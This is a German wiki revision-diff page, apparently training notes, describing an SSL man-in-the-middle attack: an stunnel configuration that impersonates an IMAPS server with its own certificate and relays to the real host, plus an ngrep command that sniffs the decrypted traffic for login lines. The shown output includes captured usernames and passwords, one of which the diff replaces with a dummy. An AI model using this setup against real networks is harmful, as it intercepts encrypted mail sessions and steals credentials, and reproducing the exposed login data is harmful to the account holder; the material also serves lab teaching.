SSL Man in the Middle: Unterschied zwischen den Versionen

Aus xinux.net
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=Kali Linux= ==nat== ==arpspoofing== =stunnel= debug = 7 options = NO_SSLv2 output = /var/log/stunnel.log [to-server] client = yes accept = 0.0.0.0:999…“)
 
Zeile 29: Zeile 29:
  
 
==ngrep==
 
==ngrep==
 
+
*ngrep -d lo -s 1500 -l -i 'login' port 9999
ngrep -d lo -s 1500 -l -i 'login' port 9999
+
<pre>
 
interface: lo (127.0.0.0/255.0.0.0)
 
interface: lo (127.0.0.0/255.0.0.0)
 
filter: (ip or ip6) and ( port 9999 )
 
filter: (ip or ip6) and ( port 9999 )
Zeile 36: Zeile 36:
 
#
 
#
 
T 127.0.0.1:45277 -> 127.0.0.1:9999 [AP]
 
T 127.0.0.1:45277 -> 127.0.0.1:9999 [AP]
   . login thomas.will Fr3T!Tch3n.                                             
+
   . login badura suxpass.                                             
 
##
 
##
 +
</pre>

Version vom 20. Oktober 2015, 16:59 Uhr

Kali Linux

nat

arpspoofing

stunnel

debug = 7 options = NO_SSLv2 output = /var/log/stunnel.log

[to-server] client = yes accept = 0.0.0.0:9999 connect = thor.tuxmen.de:993 verify = 2 CAfile = /etc/stunnel/xin-old-ca.crt

[from-client] accept = 0.0.0.0:993 connect = 127.0.0.1:9999 cert = /etc/stunnel/kali.xinux.org.crt key = /etc/stunnel/kali.xinux.org.key CAfile = /etc/stunnel/xin-ca.crt

ngrep

  • ngrep -d lo -s 1500 -l -i 'login' port 9999
interface: lo (127.0.0.0/255.0.0.0)
filter: (ip or ip6) and ( port 9999 )
match: login
#
T 127.0.0.1:45277 -> 127.0.0.1:9999 [AP]
  . login badura suxpass.                                            
##